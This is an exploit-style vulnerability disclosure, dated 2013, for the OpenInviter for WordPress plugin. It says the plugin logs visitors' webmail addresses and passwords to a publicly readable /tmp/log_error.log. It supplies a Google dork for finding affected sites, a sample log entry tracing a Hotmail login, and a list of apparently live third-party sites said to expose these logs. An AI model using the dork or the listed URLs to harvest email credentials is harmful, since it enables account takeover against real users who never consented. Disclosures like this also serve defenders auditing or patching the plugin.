########################################################## # Title : OpenInviter for WordPress Disclose User Information # Author : Ryuzaki Lawlet # Blog  : justryuz.blogspot.com / www.justryuz.com # E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org # Date: Sat Jan 5/2013 (5.47 pm) # Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/ # Type : Web Apps # Tested on : Ubuntu / Window XP # Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log ########################################################## ----> #--info about OpenInviter for WordPress: >> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog. Exploit: all login user with this plugin have log record with email/password in log_error file in folder /tmp/ and this log_error file is disclose user information like email/password in main mail Yahoo!, GMail, AOL, Hotmail and other providers Example [Years-month-day TIME] Local Debugger ----------DETAILS START---------- TRANSPORT: curl SERVICE: hotmail USER: victim@hotmail.com PASSWORD: ********* STEPS:     initial_get :         URL: http://login.live.com/login.srf?id=2         METHOD: GET         RESPONSE: OK     login_post :         URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491         METHOD: POST         ELEMENTS:             PPSX=Passp             PwdPad=             type=             PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs             LoginOptions=3             login=victim@hotmail.com             passwd=***********         RESPONSE: OK     first_redirect :         URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2         METHOD: GET         RESPONSE: FAILED ----------DETAILS END---------- #--Demo / live http://brsinfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.123employee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://realestatemegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log http://www.learnpassion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log and many at google :v.... #----> Screenshot / Preview http://i.imgur.com/tKILJ.png